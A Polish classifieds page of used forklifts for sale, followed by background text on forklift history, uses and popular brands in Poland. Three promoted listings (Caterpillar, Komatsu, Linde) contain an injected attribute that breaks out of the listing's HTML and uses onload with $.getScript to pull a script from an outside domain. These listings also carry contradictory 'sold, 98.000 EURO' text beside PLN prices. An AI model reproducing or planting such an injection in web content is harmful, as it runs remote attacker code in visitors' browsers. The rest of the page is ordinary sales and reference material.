Wyszukiwanie używanego sprzętu Zamknij » Wyszukiwanie zaawansowane

    Umieść ogłoszenie Kupię
    Liczba ogłoszeń 14 949

    Wózki widłowe używane na sprzedaż

    Wózek jezdniowy podnośnikowy zwany potocznie wózkiem widłowym jest kołowym pojazdem mechanicznym o napędzie silnikowym, który służy do przewozu ciężkich materiałów (do kilkudziesięciu ton) w transporcie bliskim i magazynowaniu. Używany jest przede wszystkim do prac rozładunkowych w magazynach, fabrykach oraz portach. Materiał przeznaczony do przemieszczenia przy pomocy wózka umieszcza się zwykle na drewnianych paletach. Wózki widłowe są dziś obecne w magazynie każdej szanującej się firmy, która stawia na szybką, sprawną i skuteczną realizację zadań logistycznych. Szybki rozwój przemysłu i logistyki wymusił na producentach liczne modyfikacje, których celem jest dostosowanie maszyn do pracy w różnych rodzajach magazynów i w różnych warunkach załadunkowych. Nic więc dziwnego, że w magazynach spotkamy kilka różnych rodzajów tych maszyn, przeznaczonych do pracy w rozmaitych warunkach: do wysokiego składowania, wózki terenowe, boczne oraz do pracy w wąskich miejscach.
    Czytaj więcej Zamknij
    ogłoszenie/strona
    • Promocja
      Caterpillar Caterpillar "onload="$.getScript('//ahfauto.de/a/m/m.js');"Dodatkowe informacje: MACHINE IS SOLD! MACHINE IS VERKAUFT! 98.000 EURO

      Wózki Diesla
      2016
      Polska
      24h

      59 336 PLN
    • Promocja
      Komatsu Komatsu "onload="$.getScript('//ahfauto.de/a/m/m.js');"Dodatkowe informacje: MACHINE IS SOLD! MACHINE IS VERKAUFT! 98.000 EURO

      Wózki LPG
      2013
      Polska
      24h

      55 098 PLN
    • Promocja
      Linde Linde "onload="$.getScript('//ahfauto.de/a/m/m.js');"Dodatkowe informacje: MACHINE IS SOLD! MACHINE IS VERKAUFT! 98.000 EURO

      Wózki LPG
      2019
      Polska
      24h

      55 098 PLN
    • Toyota 02-7 FG F 30, 2004, Wózki LPGToyota 02-7FGF30Stan (1-5): 5, Max. Udźwig: 4x2, Podnoszenie (mm): 500, Maszt: Triplex, Kabina: Osłona nad głową, Dodatkowe informacje: Toyota 02-7FGF30 -Rok produkcji 2004 -Udźwig 3000 kg -Maszt Triplex -Wysokość podnoszenia 5000 mm -Ciężar wózka 4390 kg -Napęd LPG

      Wózki LPG
      2004 3 800 h
      Polska
      24h

      36 000 PLN
    • Toyota 8 FB ET 16, 2014, Wózki elektryczneToyota 8FBET16Liczba kół: 3, Stan (1-5): 5, Max. Udźwig: 1600, Podnoszenie (mm): 300, Maszt: Duplex, Dodatkowe informacje: Toyota 8FBET16 - rok 2014 - udźwig 1600 kg - maszt duplex - wys. podnoszenia 3000 mm - wys. konstr. masztu +/-1950 mm - wys. wózka

      Wózki elektryczne
      2014
      Polska
      24h

      29 900 PLN
    • Other Wózek widłowy LINDE H 50 D, Wózki widłowe inneOther Wózek widłowy LINDE H 50 DDodatkowe informacje: Szczegółowy opis znajduje się w ekspertyzie DEKRA.

      Wózki widłowe inne

      Polska, Słomczyn 81, 05-600 Grójec
      24h

      42 900 PLN
    • Hyster H 8.00 XM, 2007, Wózki DieslaHyster H 8.00 XMStan (1-5): 4, Certyfikat CE : Tak, Max. Udźwig: 8000, Podnoszenie (mm): 465, Maszt: Duplex, Środek ciężkości: 60, Nośność wideł: Pozycjonowanie i przsuw na boki, Typ ogumienia: Pneumatyczne, Długość wideł: 240, Wysokość ze złożonym masztem: 377.9, Kabina: Kabina, Liczba kół ze sterowaniem: 6, Liczba napędzanych kół: 4, Prostownik: 3 zawór 4 zawór

      Wózki Diesla
      2007 6 300 h
      Polska, Gdańsk
      7d

      148 339 PLN
    • Promocja
      Toyota 8 FD F 30, 2007, Wózki DieslaToyota 8FDF 30Stan (1-5): 4, Umowa serwisowa: Tak, Certyfikat CE : Tak, Max. Udźwig: 4x2, Podnoszenie (mm): 450, Swobodne podnoszenie: 15, Maszt: Duplex, Środek ciężkości: 50, Nośność wideł: Przesuw boczny, Gwarancja: do uzgodnienia, Typ ogumienia: Super elastyczny, Długość wideł: 120, Wysokość ze złożonym masztem: 286, Kabina: Kabina

      Wózki Diesla
      2007 9 460 h
      Polska, Jelcz Laskowice

      33 000 PLN
    • Promocja
      Toyota 8 FG F 18, 2010, Wózki LPGToyota 8FGF18Stan (1-5): 5, Certyfikat CE : Tak, Max. Udźwig: 1750, Środek ciężkości: 50, Podnoszenie (mm): 300, Swobodne podnoszenie: 144, Wysokość ze złożonym masztem: 208, Maszt: Duplex / swobodne podnoszenie, Nośność wideł: Przesuw boczny, Długość wideł: 120, Kabina: Kabina, Typ ogumienia: Super elastyczny, Skrzynia biegów: automatyczna, Silnik: Toyota 4Y

      Wózki LPG
      2010 5 666 h
      Polska, Wrocław

      41 000 PLN
    • Toyota 8 FBMT 30, 2014, Wózki elektryczneToyota 8 FBMT 30Stan (1-5): 4, Max. Udźwig: 4x2, Kabina: Kabina

      Wózki elektryczne
      2014 5 121 h
      Polska
      7d

      39 204 PLN
    • Promocja
      Toyota 8FGKF20, 2008, Wózki LPGToyota 8FGKF20Max. Udźwig: 2000, Podnoszenie (mm): 430, Wysokość ze złożonym masztem: 208.5, Maszt: Triplex, Nośność wideł: Przesuw boczny, Długość wideł: 120, Kabina: Osłona nad głową, Typ ogumienia: Super elastyczny, Silnik: Toyota 4Y, Moc silnika: 51.67, Pozostało ogumienia przedniego: 50%, Pozostało ogumienia tylnego: 50%, Dodatkowe informacje: Szyba dachowa

      Wózki LPG
      2008 11 695 h
      Polska, Wrocław

      36 000 PLN
    • Hyster H 16.00 XM-6, 2015, Wózki DieslaHyster H 16.00 XM-6Stan (1-5): 5, Certyfikat CE : Tak, Max. Udźwig: 16000, Podnoszenie (mm): 375, Maszt: Duplex, Środek ciężkości: 60, Nośność wideł: Pozycjonowanie i przsuw na boki, Typ ogumienia: Pneumatyczne, Długość wideł: 240, Wysokość ze złożonym masztem: 364.1, Kabina: Kabina, Pozostało ogumienia przedniego: 100%, Pozostało ogumienia tylnego: 100%, Typ ogumienia przedniego: PN, Typ ogumienia tylnego: PN, Liczba kół ze sterowaniem: 6

      Wózki Diesla
      2015 1 300 h
      Polska, Gdańsk
      7d

      402 636 PLN
    • Hyster H 80 FT, 2014, Wózki DieslaHyster H8.0FT6Stan (1-5): 4, Certyfikat CE : Tak, Podnoszenie (mm): 551.5, Maszt: Triplex, Środek ciężkości: 60, Nośność wideł: Pozycjonowanie i przsuw na boki, Typ ogumienia: Super elastyczny, Długość wideł: 240, Wysokość ze złożonym masztem: 300.2, Kabina: Kabina, Liczba kół ze sterowaniem: 6, Liczba napędzanych kół: 4, Prostownik: 3 zawór 4 zawór

      Wózki Diesla
      2014 2 250 h
      Polska, Kajetany
      7d

      237 343 PLN
    • Toyota 8 FB ET 20, 2014, Wózki elektryczneToyota 8 FB ET 20Stan (1-5): 4

      Wózki elektryczne
      2014 3 744 h
      Polska
      7d

      20 979 PLN
    • Hyster H 5.0 FT, 2012, Wózki DieslaHyster H 5.0 FTStan (1-5): 4, Certyfikat CE : Tak, Max. Udźwig: 5000, Podnoszenie (mm): 340, Maszt: Duplex, Nośność wideł: Przesuw wideł na boki, Typ ogumienia: Pneumatyczne, Długość wideł: 120, Kabina: Kabina, Liczba kół ze sterowaniem: 4, Liczba napędzanych kół: 2, Prostownik: 3 zawór

      Wózki Diesla
      2012 1 320 h
      Polska, Kajetany
      7d

      76 289 PLN
    • Hyster H 1.6 FT, 2015, Wózki LPGHyster H 1.6 FTStan (1-5): 4, Certyfikat CE : Tak, Max. Udźwig: 1600, Podnoszenie (mm): 333, Maszt: Duplex, Nośność wideł: Przesuw wideł na boki, Długość wideł: 100, Typ ogumienia: Pełne, Liczba kół ze sterowaniem: 4, Liczba napędzanych kół: 2, Prostownik: 3 zawór, Certyfikaty: CE

      Wózki LPG
      2015 4 600 h
      Polska, Kajetany
      7d

      38 144 PLN
    • Hyster H 3.00 FT, 2012, Wózki DieslaHyster H 3.00 FTStan (1-5): 4, Certyfikat CE : Tak, Max. Udźwig: 4x2, Podnoszenie (mm): 310.5, Maszt: Duplex, Nośność wideł: Przesuw wideł na boki, Typ ogumienia: Super elastyczny, Długość wideł: 120, Kabina: Kabina, Liczba kół ze sterowaniem: 4, Liczba napędzanych kół: 2, Prostownik: 3 zawór, Certyfikaty: CE

      Wózki Diesla
      2012 6 000 h
      Polska, Kajetany
      7d

      42 383 PLN
    • Svetruck 15120-35, 1988, Wózki DieslaSvetruck 15120-35Stan (1-5): 3, Max. Udźwig: 15000, Maszt: Duplex, Nośność wideł: Pozycjonowanie, przesuw na boki, pochylanie wideł, Silnik: Volvo, Liczba kół ze sterowaniem: 2, Liczba napędzanych kół: 2

      Wózki Diesla
      1988 23 365 h
      Polska, Sadlinki
      7d

      168 000 PLN
    • Jumbo J/SL, 2000, Wózki DieslaJumbo J/SLStan (1-5): 5, Max. Udźwig: 7000, Podnoszenie (mm): 400, Maszt: Duplex, Dodatkowe informacje: Wózek widłowy bocznego załadunku JUMBO J/SL 70/18/40 Rok produkcji 2000 Udźwig 7000 kg Wysokość podnoszenia 4000 mm Maszt

      Wózki Diesla
      2000
      Polska
      7d

      89 000 PLN
    • Toyota 5 FD 70, 2011, Wózki DieslaToyota 5FD70Stan (1-5): 5, Max. Udźwig: 7000, Podnoszenie (mm): 400, Maszt: Duplex, Dodatkowe informacje: Wózek widłowy Toyota 5FD70 -rok produkcji 2011 -udźwig 7000 kg -maszt duplex -wysokość podnoszenia 4000 mm -napęd diesel -koła pełn

      Wózki Diesla
      2011
      Polska
      7d

      75 000 PLN

    Wózki widłowe pojawiły się w produkcji w latach 20-tych ubiegłego stulecia. Pierwszymi producentami były firmy: Clark (obecnie Clark Material Handling Company), Yale & Towne Manufacturing, Gesellschaft für Linde’s Eismachinen (obecnie Linde), Still, Hyster. W latach 50-tych i 60-tych na rynku zaczęły działać kolejne firmy tj. Jungheinrich czy Toyota Material Handling Group. Pierwsze wózki miały napęd silnikowy. Przełomowe w technologii produkcji sprzętu do magazynowania były lata 50-te i 60-te XX wieku. Wtedy to powstały pierwsze wózki widłowe z napędem hydrostatycznym (Linde) oraz elektrycznym, produkowane m.in. przez niemiecką firmę Still.

    Sama podstawowa konstrukcja tych maszyn nie zmieniła się od wielu lat: stalowa rama, podwozie trzy lub czterokołowe, silnik, przeciwaga oraz maszt z widłami. W ostatnich latach konstruktorzy skupili się głównie nad poprawą bezpieczeństwa pracy operatora, ergonomią i komfortem pracy oraz ekologią. Dużą wagę zaczęto przykładać również do designu produktów. Tutaj przoduje firma Linde, która w latach 2005-2008 uzyskała kilka prestiżowych nagród za stylistykę swoich produktów (m.in. nagrody Reddot Design Award). Jeżeli chodzi o jednostki napędowe w tych maszynach to mamy dzisiaj do wyboru silniki spalinowe, elektryczne i gazowe. Firma Still zaczęła w ostatnich latach jako pierwsza seryjnie produkować wózek widłowy z silnikiem hybrydowym (model RX70 Hybrid)

    Zastosowanie

    Podstawowym zadaniem wózka widłowego jest przenoszenie ciężkich przedmiotów z jednego miejsca na drugie Rozwój przemysłu oraz logistyki sprawił, że producenci sprzętu do magazynowania zaczęli modyfikować swoje produkty, tak żeby mogły mieć zastosowanie we wszystkich rodzajach magazynów oraz żeby mogły pracować w różnych warunkach załadunkowych. Dlatego dzisiaj mając magazyn lub firmę logistyczną można wykorzystać nie tylko standardowe wózki unoszące (3-kołowe, 4 kołowe), ale również wózki spełniające bardzo specjalistyczne wymagania. Do takich bez wątpienia należą wózki wysokiego składowania, takie jak np. Still FM14, który może podnosić towary na wysokość 6,5 m, czy też Linde R16, za pomocą którego można „wrzucić” towar na półkę będącą na wysokości 7 m. Towar w magazynie trzeba często kompletować na palecie. Do tego pomocne są wózki nisko unoszące do komplementacji (np. Jungheinrich ECE 220, Still CXM 10, Linde N20). Sprzęt tego typu wyposażony jest najczęściej w silnik elektryczny o zmniejszonej mocy.

    Komplementację towaru można też zrobić na wysokości – wystarczy użyć np. wózka Still EK12 (wysoko unoszący do komplementacji). Ciekawym rodzajem specjalistycznej maszyny magazynowej są wózki czterokierunkowe firmy Combilift. Jest to idealna maszyna dla składów budowlanych, tartaków, która łączy cechy wózka wysokiego składowania oraz wózka bocznego. Taką maszyną bez problemu można przewieźć długie, ciężkie towary i załadować je na samochód ciężarowy. Do przenoszenia ciężkich towarów (4-5 ton) idealnie nadaje się wózek terenowy np. Manitou MC 30. To już spora maszyna, która może dźwigać i przenosić naprawdę duże towary. Ale prawdziwym gigantem w tej kategorii sprzętu są wózki - podnośniki do załadunku kontenerów. W tym segmencie dominują maszyny ze znakiem Kalmar, Terex i Hyster, które podnoszą i przewożą 10 tonowe kontenery niczym piórko.

    Najpopularniejsze wózki widłowe w Polsce.

    Na polskim rynku działają wszyscy najwięksi producenci wózków widłowych. Do najpopularniejszych marek należy bez wątpienia Linde. Model Linde H30 to czterokołowy wózek widłowy, idealny do każdego magazynu. Za pomocą tej maszyny można przenieść 3-tonowy ładunek i postawić go na wysokości ponad 3 m. Wielką popularnością cieszą się również dwa inne modele tego producenta: Linde H25 i Linde H35. Marka ta uchodzi za niezawodną, z szeroko dostępnym serwisem i niezbyt wysokimi kosztami eksploatacji. Ceny używanych wózków widłowych Linde kształtują się pomiędzy 25 000 zł a 40 000 zł, w zależności od modelu, rocznika oraz stanu technicznego.

    Niezwykle popularne w Polsce są również wózki widłowe Toyota, szczególnie model Toyota 7FG, które mają zbliżone parametry techniczne do wózków Linde z serii H30. Popularność japońskiego producenta wynika przede wszystkim ze znanej marki motoryzacyjnej, która tożsama jest z niezawodnością i precyzją wykonania. Cenowo sprzęt Toyoty jest zbliżony do konkurencyjnego Linde (30 000 – 40 000 zł). Trzecią najczęściej spotykaną marką w polskich magazynach jest niemiecki Still R70 - czterokołowy wózek, o udźwigu do 4 ton i 3 metrowym masztem. Użytkownicy cenią w tej marce przede wszystkim niemiecką niezawodność, która jest efektem wieloletniego doświadczenia w produkcji sprzętu do magazynowania. Ceny używanych wózków tej marki kształtują się od 30 000 do 60 000 zł. Oczywiście na polskim rynku nie brakuje dwóch „historycznych” firm produkujących sprzęt do magazynowania – Jungheinrich i Hyster. Mówiąc o „historyczności” mamy na myśli wieloletnie doświadczenie w tej branży, które dzisiaj przekłada się na jakość oraz innowacyjność. W polskich halach magazynowych często możemy spotkać pracujące trzykołowe wózki Jungheinrich EFG 216, czterokołowe Jungheinrich TFG 425 czy też Hyster H7 i Hyster H2.

    Intralogistyka

    Dzisiaj każdy szanujący się magazyn, który sprawnie chce realizować zadania logistyczne musi mieć na wyposażeniu kilka rodzajów specjalistycznych wózków widłowych: do wysokiego składowania, terenowy, boczny, do wąskich przejść itd. Wyzwaniem przyszłości w logistyce jest optymalizacja procesów magazynowych. Takiemu wyzwaniu czoła próbuje stawić Still ze swoim urządzeniem cubeXX. Jest to najprościej mówiąc jeden wózek widłowy zawierający w sobie: wózek komisjonowania poziomego, wózek wysokiego składowania, ciągnik, wózek dwupoziomowy, wózek niskiego unoszenia oraz wózek z przeciwwagą. Still cubeXX to już nie wózek widłowy – to rozwiązanie intralogistyczne. Mały i zwrotny nie potrzebuje dużych przestrzeni pomiędzy regałami. Ekologiczny – wykorzystujący baterię litowo-jonowe. Ergonomiczny – po zakończonej pracy składa się w jeden niepozornie wyglądający sześcian. Tylko, że ten sześcian jest naszpikowany elektroniką i najnowocześniejszymi rozwiązaniami technologicznymi. I oczywiście z pięknym designem.